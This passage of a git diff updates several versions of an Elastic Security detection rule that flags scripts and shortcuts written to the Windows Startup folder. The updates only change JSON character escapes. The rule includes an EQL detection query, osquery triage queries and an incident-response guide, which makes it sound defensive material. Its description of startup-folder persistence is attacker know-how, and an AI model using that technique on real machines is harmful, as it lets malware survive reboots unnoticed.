!{osquery{\"label\":\"Osquery - Retrieve DNS Cache\",\"query\":\"SELECT * FROM dns_cache\"}}\n - Use the Elastic Defend registry events to examine registry keys accessed, modified, or created by the related processes in the process tree.\n - Examine the host services for suspicious or anomalous entries.\n - !{osquery{\"label\":\"Osquery - Retrieve All Services\",\"query\":\"SELECT description, display_name, name, path, pid, service_type, start_type, status, user_account FROM services\"}}\n - !{osquery{\"label\":\"Osquery - Retrieve Services Running on User Accounts\",\"query\":\"SELECT description, display_name, name, path, pid, service_type, start_type, status, user_account FROM services WHERE\\nNOT (user_account LIKE '%LocalSystem' OR user_account LIKE '%LocalService' OR user_account LIKE '%NetworkService' OR\\nuser_account == null)\\n\"}}\n - !{osquery{\"label\":\"Osquery - Retrieve Service Unsigned Executables with Virustotal Link\",\"query\":\"SELECT concat('https://www.virustotal.com/gui/file/', sha1) AS VtLink, name, description, start_type, status, pid,\\nservices.path FROM services JOIN authenticode ON services.path = authenticode.path OR services.module_path =\\nauthenticode.path JOIN hash ON services.path = hash.path WHERE authenticode.result != 'trusted'\\n\"}}\n - Retrieve the files' SHA-256 hash values using the PowerShell `Get-FileHash` cmdlet and search for the existence and reputation of the hashes in resources like VirusTotal, Hybrid-Analysis, CISCO Talos, Any.run, etc.\n- Investigate potentially compromised accounts. Analysts can do this by searching for login events (for example, 4624) to the target host after the registry modification.\n\n### False positive analysis\n\n- This activity is unlikely to happen legitimately. 
Benign true positives (B-TPs) can be added as exceptions if necessary.\n\n### Related rules\n\n- Suspicious Startup Shell Folder Modification - c8b150f0-0164-475b-a75e-74b47800a9ff\n- Startup Folder Persistence via Unsigned Process - 2fba96c0-ade5-4bce-b92f-a5df2509da3f\n\n### Response and remediation\n\n- Initiate the incident response process based on the outcome of the triage.\n- Isolate the involved host to prevent further post-compromise behavior.\n- If the triage identified malware, search the environment for additional compromised hosts.\n - Implement temporary network rules, procedures, and segmentation to contain the malware.\n - Stop suspicious processes.\n - Immediately block the identified indicators of compromise (IoCs).\n - Inspect the affected systems for additional malware backdoors like reverse shells, reverse proxies, or droppers that attackers could use to reinfect the system.\n- Remove and block malicious artifacts identified during triage.\n- Investigate credential exposure on systems compromised or used by the attacker to ensure all compromised accounts are identified. Reset passwords for these accounts and other potentially compromised credentials, such as email, business systems, and web services.\n- Run a full antimalware scan. This may reveal additional artifacts left in the system, persistence mechanisms, and malware components.\n- Determine the initial vector abused by the attacker and take action to prevent reinfection through the same vector.\n- Using the incident response data, update logging and audit policies to improve the mean time to detect (MTTD) and the mean time to respond (MTTR).", + "note": "## Triage and analysis\n\n### Investigating Persistent Scripts in the Startup Directory\n\nThe Windows Startup folder is a special folder in Windows. 
Programs added to this folder are executed during account logon, without user interaction, providing an excellent way for attackers to maintain persistence.\n\nThis rule looks for shortcuts created by wscript.exe or cscript.exe, or js/vbs scripts created by any process.\n\n> **Note**:\n> This investigation guide uses the [Osquery Markdown Plugin](https://www.elastic.co/guide/en/security/master/invest-guide-run-osquery.html) introduced in Elastic Stack version 8.5.0. Older Elastic Stack versions will display unrendered Markdown in this guide.\n\n#### Possible investigation steps\n\n- Investigate the process execution chain (parent process tree) for unknown processes. Examine their executable files for prevalence, whether they are located in expected locations, and if they are signed with valid digital signatures.\n- Investigate other alerts associated with the user/host during the past 48 hours.\n- Validate if the activity is not related to planned patches, updates, network administrator activity, or legitimate software installations.\n- Assess whether this behavior is prevalent in the environment by looking for similar occurrences across hosts.\n- Examine the host for derived artifacts that indicate suspicious activities:\n - Analyze the file using a private sandboxed analysis system.\n - Observe and collect information about the following activities in both the sandbox and the alert subject host:\n - Attempts to contact external domains and addresses.\n - Use the Elastic Defend network events to determine domains and addresses contacted by the subject process by filtering by the process' `process.entity_id`.\n - Examine the DNS cache for suspicious or anomalous entries.\n - !{osquery{\"label\":\"Osquery - Retrieve DNS Cache\",\"query\":\"SELECT * FROM dns_cache\"}}\n - Use the Elastic Defend registry events to examine registry keys accessed, modified, or created by the related processes in the process tree.\n - Examine the host services for suspicious or anomalous 
entries.\n - !{osquery{\"label\":\"Osquery - Retrieve All Services\",\"query\":\"SELECT description, display_name, name, path, pid, service_type, start_type, status, user_account FROM services\"}}\n - !{osquery{\"label\":\"Osquery - Retrieve Services Running on User Accounts\",\"query\":\"SELECT description, display_name, name, path, pid, service_type, start_type, status, user_account FROM services WHERE\\nNOT (user_account LIKE '%LocalSystem' OR user_account LIKE '%LocalService' OR user_account LIKE '%NetworkService' OR\\nuser_account == null)\\n\"}}\n - !{osquery{\"label\":\"Osquery - Retrieve Service Unsigned Executables with Virustotal Link\",\"query\":\"SELECT concat('https://www.virustotal.com/gui/file/', sha1) AS VtLink, name, description, start_type, status, pid,\\nservices.path FROM services JOIN authenticode ON services.path = authenticode.path OR services.module_path =\\nauthenticode.path JOIN hash ON services.path = hash.path WHERE authenticode.result != 'trusted'\\n\"}}\n - Retrieve the files' SHA-256 hash values using the PowerShell `Get-FileHash` cmdlet and search for the existence and reputation of the hashes in resources like VirusTotal, Hybrid-Analysis, CISCO Talos, Any.run, etc.\n- Investigate potentially compromised accounts. Analysts can do this by searching for login events (for example, 4624) to the target host after the registry modification.\n\n### False positive analysis\n\n- This activity is unlikely to happen legitimately. 
Benign true positives (B-TPs) can be added as exceptions if necessary.\n\n### Related rules\n\n- Suspicious Startup Shell Folder Modification - c8b150f0-0164-475b-a75e-74b47800a9ff\n- Startup Folder Persistence via Unsigned Process - 2fba96c0-ade5-4bce-b92f-a5df2509da3f\n\n### Response and remediation\n\n- Initiate the incident response process based on the outcome of the triage.\n- Isolate the involved host to prevent further post-compromise behavior.\n- If the triage identified malware, search the environment for additional compromised hosts.\n - Implement temporary network rules, procedures, and segmentation to contain the malware.\n - Stop suspicious processes.\n - Immediately block the identified indicators of compromise (IoCs).\n - Inspect the affected systems for additional malware backdoors like reverse shells, reverse proxies, or droppers that attackers could use to reinfect the system.\n- Remove and block malicious artifacts identified during triage.\n- Investigate credential exposure on systems compromised or used by the attacker to ensure all compromised accounts are identified. Reset passwords for these accounts and other potentially compromised credentials, such as email, business systems, and web services.\n- Run a full antimalware scan. 
This may reveal additional artifacts left in the system, persistence mechanisms, and malware components.\n- Determine the initial vector abused by the attacker and take action to prevent reinfection through the same vector.\n- Using the incident response data, update logging and audit policies to improve the mean time to detect (MTTD) and the mean time to respond (MTTR).", "query": "file where host.os.type == \"windows\" and event.type != \"deletion\" and user.domain != \"NT AUTHORITY\" and\n\n /* detect shortcuts created by wscript.exe or cscript.exe */\n (file.path : \"C:\\\\*\\\\Programs\\\\Startup\\\\*.lnk\" and\n process.name : (\"wscript.exe\", \"cscript.exe\")) or\n\n /* detect vbs or js files created by any process */\n file.path : (\"C:\\\\*\\\\Programs\\\\Startup\\\\*.vbs\",\n \"C:\\\\*\\\\Programs\\\\Startup\\\\*.vbe\",\n \"C:\\\\*\\\\Programs\\\\Startup\\\\*.wsh\",\n \"C:\\\\*\\\\Programs\\\\Startup\\\\*.wsf\",\n \"C:\\\\*\\\\Programs\\\\Startup\\\\*.js\")\n", "related_integrations": [ { @@ -55,7 +55,7 @@ ], "risk_score": 47, "rule_id": "f7c4dc5a-a58d-491d-9f14-9b66507121c0", - "setup": "If enabling an EQL rule on a non-elastic-agent index (such as beats) for versions \u003c8.2, events will not define `event.ingested` and default fallback for EQL rules was not added until 8.2, so you will need to add a custom pipeline to populate `event.ingested` to @timestamp for this rule to work.", + "setup": "If enabling an EQL rule on a non-elastic-agent index (such as beats) for versions <8.2, events will not define `event.ingested` and default fallback for EQL rules was not added until 8.2, so you will need to add a custom pipeline to populate `event.ingested` to @timestamp for this rule to work.", "severity": "medium", "tags": [ "Domain: Endpoint", @@ -67,7 +67,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0003", "name": "Persistence", 
diff --git a/packages/security_detection_engine/kibana/security_rule/f7c4dc5a-a58d-491d-9f14-9b66507121c0_107.json b/packages/security_detection_engine/kibana/security_rule/f7c4dc5a-a58d-491d-9f14-9b66507121c0_107.json
index 56402e10641..660a677cf17 100644
--- a/packages/security_detection_engine/kibana/security_rule/f7c4dc5a-a58d-491d-9f14-9b66507121c0_107.json
+++ b/packages/security_detection_engine/kibana/security_rule/f7c4dc5a-a58d-491d-9f14-9b66507121c0_107.json
@@ -14,7 +14,7 @@ "language": "eql", "license": "Elastic License v2", "name": "Persistent Scripts in the Startup Directory", - "note": "## Triage and analysis\n\n### Investigating Persistent Scripts in the Startup Directory\n\nThe Windows Startup folder is a special folder in Windows. Programs added to this folder are executed during account logon, without user interaction, providing an excellent way for attackers to maintain persistence.\n\nThis rule looks for shortcuts created by wscript.exe or cscript.exe, or js/vbs scripts created by any process.\n\n\u003e **Note**:\n\u003e This investigation guide uses the [Osquery Markdown Plugin](https://www.elastic.co/guide/en/security/master/invest-guide-run-osquery.html) introduced in Elastic Stack version 8.5.0. Older Elastic Stack versions will display unrendered Markdown in this guide.\n\n#### Possible investigation steps\n\n- Investigate the process execution chain (parent process tree) for unknown processes. Examine their executable files for prevalence, whether they are located in expected locations, and if they are signed with valid digital signatures.\n- Investigate other alerts associated with the user/host during the past 48 hours.\n- Validate if the activity is not related to planned patches, updates, network administrator activity, or legitimate software installations.\n- Assess whether this behavior is prevalent in the environment by looking for similar occurrences across hosts.\n- Examine the host for derived artifacts that indicate suspicious activities:\n - Analyze the file using a private sandboxed analysis system.\n - Observe and collect information about the following activities in both the sandbox and the alert subject host:\n - Attempts to contact external domains and addresses.\n - Use the Elastic Defend network events to determine domains and addresses contacted by the subject process by filtering by the process' `process.entity_id`.\n - Examine the DNS cache for suspicious or anomalous entries.\n - 
!{osquery{\"label\":\"Osquery - Retrieve DNS Cache\",\"query\":\"SELECT * FROM dns_cache\"}}\n - Use the Elastic Defend registry events to examine registry keys accessed, modified, or created by the related processes in the process tree.\n - Examine the host services for suspicious or anomalous entries.\n - !{osquery{\"label\":\"Osquery - Retrieve All Services\",\"query\":\"SELECT description, display_name, name, path, pid, service_type, start_type, status, user_account FROM services\"}}\n - !{osquery{\"label\":\"Osquery - Retrieve Services Running on User Accounts\",\"query\":\"SELECT description, display_name, name, path, pid, service_type, start_type, status, user_account FROM services WHERE\\nNOT (user_account LIKE '%LocalSystem' OR user_account LIKE '%LocalService' OR user_account LIKE '%NetworkService' OR\\nuser_account == null)\\n\"}}\n - !{osquery{\"label\":\"Osquery - Retrieve Service Unsigned Executables with Virustotal Link\",\"query\":\"SELECT concat('https://www.virustotal.com/gui/file/', sha1) AS VtLink, name, description, start_type, status, pid,\\nservices.path FROM services JOIN authenticode ON services.path = authenticode.path OR services.module_path =\\nauthenticode.path JOIN hash ON services.path = hash.path WHERE authenticode.result != 'trusted'\\n\"}}\n - Retrieve the files' SHA-256 hash values using the PowerShell `Get-FileHash` cmdlet and search for the existence and reputation of the hashes in resources like VirusTotal, Hybrid-Analysis, CISCO Talos, Any.run, etc.\n- Investigate potentially compromised accounts. Analysts can do this by searching for login events (for example, 4624) to the target host after the registry modification.\n\n### False positive analysis\n\n- This activity is unlikely to happen legitimately. 
Benign true positives (B-TPs) can be added as exceptions if necessary.\n\n### Related rules\n\n- Suspicious Startup Shell Folder Modification - c8b150f0-0164-475b-a75e-74b47800a9ff\n- Startup Folder Persistence via Unsigned Process - 2fba96c0-ade5-4bce-b92f-a5df2509da3f\n\n### Response and remediation\n\n- Initiate the incident response process based on the outcome of the triage.\n- Isolate the involved host to prevent further post-compromise behavior.\n- If the triage identified malware, search the environment for additional compromised hosts.\n - Implement temporary network rules, procedures, and segmentation to contain the malware.\n - Stop suspicious processes.\n - Immediately block the identified indicators of compromise (IoCs).\n - Inspect the affected systems for additional malware backdoors like reverse shells, reverse proxies, or droppers that attackers could use to reinfect the system.\n- Remove and block malicious artifacts identified during triage.\n- Investigate credential exposure on systems compromised or used by the attacker to ensure all compromised accounts are identified. Reset passwords for these accounts and other potentially compromised credentials, such as email, business systems, and web services.\n- Run a full antimalware scan. This may reveal additional artifacts left in the system, persistence mechanisms, and malware components.\n- Determine the initial vector abused by the attacker and take action to prevent reinfection through the same vector.\n- Using the incident response data, update logging and audit policies to improve the mean time to detect (MTTD) and the mean time to respond (MTTR).", + "note": "## Triage and analysis\n\n### Investigating Persistent Scripts in the Startup Directory\n\nThe Windows Startup folder is a special folder in Windows. 
Programs added to this folder are executed during account logon, without user interaction, providing an excellent way for attackers to maintain persistence.\n\nThis rule looks for shortcuts created by wscript.exe or cscript.exe, or js/vbs scripts created by any process.\n\n> **Note**:\n> This investigation guide uses the [Osquery Markdown Plugin](https://www.elastic.co/guide/en/security/master/invest-guide-run-osquery.html) introduced in Elastic Stack version 8.5.0. Older Elastic Stack versions will display unrendered Markdown in this guide.\n\n#### Possible investigation steps\n\n- Investigate the process execution chain (parent process tree) for unknown processes. Examine their executable files for prevalence, whether they are located in expected locations, and if they are signed with valid digital signatures.\n- Investigate other alerts associated with the user/host during the past 48 hours.\n- Validate if the activity is not related to planned patches, updates, network administrator activity, or legitimate software installations.\n- Assess whether this behavior is prevalent in the environment by looking for similar occurrences across hosts.\n- Examine the host for derived artifacts that indicate suspicious activities:\n - Analyze the file using a private sandboxed analysis system.\n - Observe and collect information about the following activities in both the sandbox and the alert subject host:\n - Attempts to contact external domains and addresses.\n - Use the Elastic Defend network events to determine domains and addresses contacted by the subject process by filtering by the process' `process.entity_id`.\n - Examine the DNS cache for suspicious or anomalous entries.\n - !{osquery{\"label\":\"Osquery - Retrieve DNS Cache\",\"query\":\"SELECT * FROM dns_cache\"}}\n - Use the Elastic Defend registry events to examine registry keys accessed, modified, or created by the related processes in the process tree.\n - Examine the host services for suspicious or anomalous 
entries.\n - !{osquery{\"label\":\"Osquery - Retrieve All Services\",\"query\":\"SELECT description, display_name, name, path, pid, service_type, start_type, status, user_account FROM services\"}}\n - !{osquery{\"label\":\"Osquery - Retrieve Services Running on User Accounts\",\"query\":\"SELECT description, display_name, name, path, pid, service_type, start_type, status, user_account FROM services WHERE\\nNOT (user_account LIKE '%LocalSystem' OR user_account LIKE '%LocalService' OR user_account LIKE '%NetworkService' OR\\nuser_account == null)\\n\"}}\n - !{osquery{\"label\":\"Osquery - Retrieve Service Unsigned Executables with Virustotal Link\",\"query\":\"SELECT concat('https://www.virustotal.com/gui/file/', sha1) AS VtLink, name, description, start_type, status, pid,\\nservices.path FROM services JOIN authenticode ON services.path = authenticode.path OR services.module_path =\\nauthenticode.path JOIN hash ON services.path = hash.path WHERE authenticode.result != 'trusted'\\n\"}}\n - Retrieve the files' SHA-256 hash values using the PowerShell `Get-FileHash` cmdlet and search for the existence and reputation of the hashes in resources like VirusTotal, Hybrid-Analysis, CISCO Talos, Any.run, etc.\n- Investigate potentially compromised accounts. Analysts can do this by searching for login events (for example, 4624) to the target host after the registry modification.\n\n### False positive analysis\n\n- This activity is unlikely to happen legitimately. 
Benign true positives (B-TPs) can be added as exceptions if necessary.\n\n### Related rules\n\n- Suspicious Startup Shell Folder Modification - c8b150f0-0164-475b-a75e-74b47800a9ff\n- Startup Folder Persistence via Unsigned Process - 2fba96c0-ade5-4bce-b92f-a5df2509da3f\n\n### Response and remediation\n\n- Initiate the incident response process based on the outcome of the triage.\n- Isolate the involved host to prevent further post-compromise behavior.\n- If the triage identified malware, search the environment for additional compromised hosts.\n - Implement temporary network rules, procedures, and segmentation to contain the malware.\n - Stop suspicious processes.\n - Immediately block the identified indicators of compromise (IoCs).\n - Inspect the affected systems for additional malware backdoors like reverse shells, reverse proxies, or droppers that attackers could use to reinfect the system.\n- Remove and block malicious artifacts identified during triage.\n- Investigate credential exposure on systems compromised or used by the attacker to ensure all compromised accounts are identified. Reset passwords for these accounts and other potentially compromised credentials, such as email, business systems, and web services.\n- Run a full antimalware scan. 
This may reveal additional artifacts left in the system, persistence mechanisms, and malware components.\n- Determine the initial vector abused by the attacker and take action to prevent reinfection through the same vector.\n- Using the incident response data, update logging and audit policies to improve the mean time to detect (MTTD) and the mean time to respond (MTTR).",
 "query": "file where host.os.type == \"windows\" and event.type != \"deletion\" and user.domain != \"NT AUTHORITY\" and\n\n /* detect shortcuts created by wscript.exe or cscript.exe */\n (file.path : \"C:\\\\*\\\\Programs\\\\Startup\\\\*.lnk\" and\n process.name : (\"wscript.exe\", \"cscript.exe\")) or\n\n /* detect vbs or js files created by any process */\n file.path : (\"C:\\\\*\\\\Programs\\\\Startup\\\\*.vbs\",\n \"C:\\\\*\\\\Programs\\\\Startup\\\\*.vbe\",\n \"C:\\\\*\\\\Programs\\\\Startup\\\\*.wsh\",\n \"C:\\\\*\\\\Programs\\\\Startup\\\\*.wsf\",\n \"C:\\\\*\\\\Programs\\\\Startup\\\\*.js\")\n",
 "related_integrations": [
 {
@@ -55,7 +55,7 @@
 ],
 "risk_score": 47,
 "rule_id": "f7c4dc5a-a58d-491d-9f14-9b66507121c0",
- "setup": "If enabling an EQL rule on a non-elastic-agent index (such as beats) for versions \u003c8.2, events will not define `event.ingested` and default fallback for EQL rules was not added until 8.2, so you will need to add a custom pipeline to populate `event.ingested` to @timestamp for this rule to work.",
+ "setup": "If enabling an EQL rule on a non-elastic-agent index (such as beats) for versions <8.2, events will not define `event.ingested` and default fallback for EQL rules was not added until 8.2, so you will need to add a custom pipeline to populate `event.ingested` to @timestamp for this rule to work.",
 "severity": "medium",
 "tags": [
 "Domain: Endpoint",
@@ -68,7 +68,7 @@
 ],
 "threat": [
 {
- "framework": "MITRE ATT\u0026CK",
+ "framework": "MITRE ATT&CK",
 "tactic": {
 "id": "TA0003",
 "name": "Persistence", 
diff --git a/packages/security_detection_engine/kibana/security_rule/f7c4dc5a-a58d-491d-9f14-9b66507121c0_108.json b/packages/security_detection_engine/kibana/security_rule/f7c4dc5a-a58d-491d-9f14-9b66507121c0_108.json
index 886aa61c1fb..7195043619d 100644
--- a/packages/security_detection_engine/kibana/security_rule/f7c4dc5a-a58d-491d-9f14-9b66507121c0_108.json
+++ b/packages/security_detection_engine/kibana/security_rule/f7c4dc5a-a58d-491d-9f14-9b66507121c0_108.json 
@@ -14,7 +14,7 @@
 "language": "eql",
 "license": "Elastic License v2",
 "name": "Persistent Scripts in the Startup Directory",
- "note": "## Triage and analysis\n\n### Investigating Persistent Scripts in the Startup Directory\n\nThe Windows Startup folder is a special folder in Windows. Programs added to this folder are executed during account logon, without user interaction, providing an excellent way for attackers to maintain persistence.\n\nThis rule looks for shortcuts created by wscript.exe or cscript.exe, or js/vbs scripts created by any process.\n\n\u003e **Note**:\n\u003e This investigation guide uses the [Osquery Markdown Plugin](https://www.elastic.co/guide/en/security/master/invest-guide-run-osquery.html) introduced in Elastic Stack version 8.5.0. Older Elastic Stack versions will display unrendered Markdown in this guide.\n\n#### Possible investigation steps\n\n- Investigate the process execution chain (parent process tree) for unknown processes. Examine their executable files for prevalence, whether they are located in expected locations, and if they are signed with valid digital signatures.\n- Investigate other alerts associated with the user/host during the past 48 hours.\n- Validate if the activity is not related to planned patches, updates, network administrator activity, or legitimate software installations.\n- Assess whether this behavior is prevalent in the environment by looking for similar occurrences across hosts.\n- Examine the host for derived artifacts that indicate suspicious activities:\n - Analyze the file using a private sandboxed analysis system.\n - Observe and collect information about the following activities in both the sandbox and the alert subject host:\n - Attempts to contact external domains and addresses.\n - Use the Elastic Defend network events to determine domains and addresses contacted by the subject process by filtering by the process' `process.entity_id`.\n - Examine the DNS cache for suspicious or anomalous entries.\n - 
!{osquery{\"label\":\"Osquery - Retrieve DNS Cache\",\"query\":\"SELECT * FROM dns_cache\"}}\n - Use the Elastic Defend registry events to examine registry keys accessed, modified, or created by the related processes in the process tree.\n - Examine the host services for suspicious or anomalous entries.\n - !{osquery{\"label\":\"Osquery - Retrieve All Services\",\"query\":\"SELECT description, display_name, name, path, pid, service_type, start_type, status, user_account FROM services\"}}\n - !{osquery{\"label\":\"Osquery - Retrieve Services Running on User Accounts\",\"query\":\"SELECT description, display_name, name, path, pid, service_type, start_type, status, user_account FROM services WHERE\\nNOT (user_account LIKE '%LocalSystem' OR user_account LIKE '%LocalService' OR user_account LIKE '%NetworkService' OR\\nuser_account == null)\\n\"}}\n - !{osquery{\"label\":\"Osquery - Retrieve Service Unsigned Executables with Virustotal Link\",\"query\":\"SELECT concat('https://www.virustotal.com/gui/file/', sha1) AS VtLink, name, description, start_type, status, pid,\\nservices.path FROM services JOIN authenticode ON services.path = authenticode.path OR services.module_path =\\nauthenticode.path JOIN hash ON services.path = hash.path WHERE authenticode.result != 'trusted'\\n\"}}\n - Retrieve the files' SHA-256 hash values using the PowerShell `Get-FileHash` cmdlet and search for the existence and reputation of the hashes in resources like VirusTotal, Hybrid-Analysis, CISCO Talos, Any.run, etc.\n- Investigate potentially compromised accounts. Analysts can do this by searching for login events (for example, 4624) to the target host after the registry modification.\n\n### False positive analysis\n\n- This activity is unlikely to happen legitimately. 
Benign true positives (B-TPs) can be added as exceptions if necessary.\n\n### Related rules\n\n- Suspicious Startup Shell Folder Modification - c8b150f0-0164-475b-a75e-74b47800a9ff\n- Startup Folder Persistence via Unsigned Process - 2fba96c0-ade5-4bce-b92f-a5df2509da3f\n\n### Response and remediation\n\n- Initiate the incident response process based on the outcome of the triage.\n- Isolate the involved host to prevent further post-compromise behavior.\n- If the triage identified malware, search the environment for additional compromised hosts.\n - Implement temporary network rules, procedures, and segmentation to contain the malware.\n - Stop suspicious processes.\n - Immediately block the identified indicators of compromise (IoCs).\n - Inspect the affected systems for additional malware backdoors like reverse shells, reverse proxies, or droppers that attackers could use to reinfect the system.\n- Remove and block malicious artifacts identified during triage.\n- Investigate credential exposure on systems compromised or used by the attacker to ensure all compromised accounts are identified. Reset passwords for these accounts and other potentially compromised credentials, such as email, business systems, and web services.\n- Run a full antimalware scan. This may reveal additional artifacts left in the system, persistence mechanisms, and malware components.\n- Determine the initial vector abused by the attacker and take action to prevent reinfection through the same vector.\n- Using the incident response data, update logging and audit policies to improve the mean time to detect (MTTD) and the mean time to respond (MTTR).",
+ "note": "## Triage and analysis\n\n### Investigating Persistent Scripts in the Startup Directory\n\nThe Windows Startup folder is a special folder in Windows. 
Programs added to this folder are executed during account logon, without user interaction, providing an excellent way for attackers to maintain persistence.\n\nThis rule looks for shortcuts created by wscript.exe or cscript.exe, or js/vbs scripts created by any process.\n\n> **Note**:\n> This investigation guide uses the [Osquery Markdown Plugin](https://www.elastic.co/guide/en/security/master/invest-guide-run-osquery.html) introduced in Elastic Stack version 8.5.0. Older Elastic Stack versions will display unrendered Markdown in this guide.\n\n#### Possible investigation steps\n\n- Investigate the process execution chain (parent process tree) for unknown processes. Examine their executable files for prevalence, whether they are located in expected locations, and if they are signed with valid digital signatures.\n- Investigate other alerts associated with the user/host during the past 48 hours.\n- Validate if the activity is not related to planned patches, updates, network administrator activity, or legitimate software installations.\n- Assess whether this behavior is prevalent in the environment by looking for similar occurrences across hosts.\n- Examine the host for derived artifacts that indicate suspicious activities:\n - Analyze the file using a private sandboxed analysis system.\n - Observe and collect information about the following activities in both the sandbox and the alert subject host:\n - Attempts to contact external domains and addresses.\n - Use the Elastic Defend network events to determine domains and addresses contacted by the subject process by filtering by the process' `process.entity_id`.\n - Examine the DNS cache for suspicious or anomalous entries.\n - !{osquery{\"label\":\"Osquery - Retrieve DNS Cache\",\"query\":\"SELECT * FROM dns_cache\"}}\n - Use the Elastic Defend registry events to examine registry keys accessed, modified, or created by the related processes in the process tree.\n - Examine the host services for suspicious or anomalous 
entries.\n - !{osquery{\"label\":\"Osquery - Retrieve All Services\",\"query\":\"SELECT description, display_name, name, path, pid, service_type, start_type, status, user_account FROM services\"}}\n - !{osquery{\"label\":\"Osquery - Retrieve Services Running on User Accounts\",\"query\":\"SELECT description, display_name, name, path, pid, service_type, start_type, status, user_account FROM services WHERE\\nNOT (user_account LIKE '%LocalSystem' OR user_account LIKE '%LocalService' OR user_account LIKE '%NetworkService' OR\\nuser_account == null)\\n\"}}\n - !{osquery{\"label\":\"Osquery - Retrieve Service Unsigned Executables with Virustotal Link\",\"query\":\"SELECT concat('https://www.virustotal.com/gui/file/', sha1) AS VtLink, name, description, start_type, status, pid,\\nservices.path FROM services JOIN authenticode ON services.path = authenticode.path OR services.module_path =\\nauthenticode.path JOIN hash ON services.path = hash.path WHERE authenticode.result != 'trusted'\\n\"}}\n - Retrieve the files' SHA-256 hash values using the PowerShell `Get-FileHash` cmdlet and search for the existence and reputation of the hashes in resources like VirusTotal, Hybrid-Analysis, CISCO Talos, Any.run, etc.\n- Investigate potentially compromised accounts. Analysts can do this by searching for login events (for example, 4624) to the target host after the registry modification.\n\n### False positive analysis\n\n- This activity is unlikely to happen legitimately. 
Benign true positives (B-TPs) can be added as exceptions if necessary.\n\n### Related rules\n\n- Suspicious Startup Shell Folder Modification - c8b150f0-0164-475b-a75e-74b47800a9ff\n- Startup Folder Persistence via Unsigned Process - 2fba96c0-ade5-4bce-b92f-a5df2509da3f\n\n### Response and remediation\n\n- Initiate the incident response process based on the outcome of the triage.\n- Isolate the involved host to prevent further post-compromise behavior.\n- If the triage identified malware, search the environment for additional compromised hosts.\n - Implement temporary network rules, procedures, and segmentation to contain the malware.\n - Stop suspicious processes.\n - Immediately block the identified indicators of compromise (IoCs).\n - Inspect the affected systems for additional malware backdoors like reverse shells, reverse proxies, or droppers that attackers could use to reinfect the system.\n- Remove and block malicious artifacts identified during triage.\n- Investigate credential exposure on systems compromised or used by the attacker to ensure all compromised accounts are identified. Reset passwords for these accounts and other potentially compromised credentials, such as email, business systems, and web services.\n- Run a full antimalware scan. 
This may reveal additional artifacts left in the system, persistence mechanisms, and malware components.\n- Determine the initial vector abused by the attacker and take action to prevent reinfection through the same vector.\n- Using the incident response data, update logging and audit policies to improve the mean time to detect (MTTD) and the mean time to respond (MTTR).",
 "query": "file where host.os.type == \"windows\" and event.type != \"deletion\" and user.domain != \"NT AUTHORITY\" and\n\n /* detect shortcuts created by wscript.exe or cscript.exe */\n (file.path : \"C:\\\\*\\\\Programs\\\\Startup\\\\*.lnk\" and\n process.name : (\"wscript.exe\", \"cscript.exe\")) or\n\n /* detect vbs or js files created by any process */\n file.path : (\"C:\\\\*\\\\Programs\\\\Startup\\\\*.vbs\",\n \"C:\\\\*\\\\Programs\\\\Startup\\\\*.vbe\",\n \"C:\\\\*\\\\Programs\\\\Startup\\\\*.wsh\",\n \"C:\\\\*\\\\Programs\\\\Startup\\\\*.wsf\",\n \"C:\\\\*\\\\Programs\\\\Startup\\\\*.js\")\n",
 "related_integrations": [
 {
@@ -55,7 +55,7 @@
 ],
 "risk_score": 47,
 "rule_id": "f7c4dc5a-a58d-491d-9f14-9b66507121c0",
- "setup": "If enabling an EQL rule on a non-elastic-agent index (such as beats) for versions \u003c8.2, events will not define `event.ingested` and default fallback for EQL rules was not added until 8.2, so you will need to add a custom pipeline to populate `event.ingested` to @timestamp for this rule to work.",
+ "setup": "If enabling an EQL rule on a non-elastic-agent index (such as beats) for versions <8.2, events will not define `event.ingested` and default fallback for EQL rules was not added until 8.2, so you will need to add a custom pipeline to populate `event.ingested` to @timestamp for this rule to work.",
 "severity": "medium",
 "tags": [
 "Domain: Endpoint",
@@ -68,7 +68,7 @@
 ],
 "threat": [
 {
- "framework": "MITRE ATT\u0026CK",
+ "framework": "MITRE ATT&CK",
 "tactic": {
 "id": "TA0003",
 "name": "Persistence", 
diff --git a/packages/security_detection_engine/kibana/security_rule/f7c4dc5a-a58d-491d-9f14-9b66507121c0_109.json b/packages/security_detection_engine/kibana/security_rule/f7c4dc5a-a58d-491d-9f14-9b66507121c0_109.json
index 89a39d9938a..7f3178efcc3 100644
--- a/packages/security_detection_engine/kibana/security_rule/f7c4dc5a-a58d-491d-9f14-9b66507121c0_109.json
+++ b/packages/security_detection_engine/kibana/security_rule/f7c4dc5a-a58d-491d-9f14-9b66507121c0_109.json 
@@ -14,7 +14,7 @@
 "language": "eql",
 "license": "Elastic License v2",
 "name": "Persistent Scripts in the Startup Directory",
- "note": "## Triage and analysis\n\n### Investigating Persistent Scripts in the Startup Directory\n\nThe Windows Startup folder is a special folder in Windows. Programs added to this folder are executed during account logon, without user interaction, providing an excellent way for attackers to maintain persistence.\n\nThis rule looks for shortcuts created by wscript.exe or cscript.exe, or js/vbs scripts created by any process.\n\n\u003e **Note**:\n\u003e This investigation guide uses the [Osquery Markdown Plugin](https://www.elastic.co/guide/en/security/master/invest-guide-run-osquery.html) introduced in Elastic Stack version 8.5.0. Older Elastic Stack versions will display unrendered Markdown in this guide.\n\n#### Possible investigation steps\n\n- Investigate the process execution chain (parent process tree) for unknown processes. Examine their executable files for prevalence, whether they are located in expected locations, and if they are signed with valid digital signatures.\n- Investigate other alerts associated with the user/host during the past 48 hours.\n- Validate if the activity is not related to planned patches, updates, network administrator activity, or legitimate software installations.\n- Assess whether this behavior is prevalent in the environment by looking for similar occurrences across hosts.\n- Examine the host for derived artifacts that indicate suspicious activities:\n - Analyze the file using a private sandboxed analysis system.\n - Observe and collect information about the following activities in both the sandbox and the alert subject host:\n - Attempts to contact external domains and addresses.\n - Use the Elastic Defend network events to determine domains and addresses contacted by the subject process by filtering by the process' `process.entity_id`.\n - Examine the DNS cache for suspicious or anomalous entries.\n - 
